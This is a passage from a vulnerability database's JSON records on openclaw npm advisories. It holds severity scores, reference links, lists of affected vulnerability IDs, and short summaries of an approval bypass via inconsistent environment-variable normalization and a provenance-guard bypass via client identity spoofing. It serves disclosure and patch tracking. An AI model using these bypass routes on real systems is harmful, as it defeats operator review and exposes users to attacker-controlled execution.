"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:04:21Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8rh7-6779-cjqq" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41294", "reference_id": "CVE-2026-41294", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41294" }, { "reference_url": "https://github.com/advisories/GHSA-8rh7-6779-cjqq", "reference_id": "GHSA-8rh7-6779-cjqq", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8rh7-6779-cjqq" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-cwd-env-file", "reference_id": "openclaw-environment-variable-injection-via-cwd-env-file", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:04:21Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-cwd-env-file" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41294", "GHSA-8rh7-6779-cjqq" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1smq-mbty-jkaj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90105?format=api", "vulnerability_id": "VCID-1ufd-uuqk-nbdv", "summary": "Duplicate Advisory: OpenClaw: Windows media loaders accepted remote-host file URLs before local path validation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-h3x4-hc5v-v2gm. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw versions prior to commit b57b680 contain an approval bypass vulnerability due to inconsistent environment variable normalization between approval and execution paths, allowing attackers to inject attacker-controlled environment variables into execution without approval system validation. Attackers can exploit differing normalization logic to discard non-portable keys during approval processing while accepting them at execution time, bypassing operator review and potentially influencing runtime behavior including execution of attacker-controlled binaries.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/59182", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/59182" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34426", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34426" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization" }, { "reference_url": "https://github.com/advisories/GHSA-8h8f-7cxm-m38j", "reference_id": "GHSA-8h8f-7cxm-m38j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8h8f-7cxm-m38j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "GHSA-8h8f-7cxm-m38j" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1ufd-uuqk-nbdv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91104?format=api", "vulnerability_id": "VCID-24m7-jx1g-hqde", "summary": "OpenClaw: Gateway chat.send ACP-only provenance guard could be bypassed by client identity spoofing\n## Summary\n\nACP-only provenance fields in `chat.send` were gated by self-declared client metadata from the WebSocket handshake rather than verified authorization state.\n\n## Impact\n\nA normal authenticated operator client could spoof ACP identity labels and inject reserved provenance fields intended only for the ACP bridge.\n\n## Affected Component\n\n`src/gateway/server-methods/chat.ts, src/gateway/server/ws-connection/message-handler.ts`\n\n## Fixed Versions\n\n- Affected: 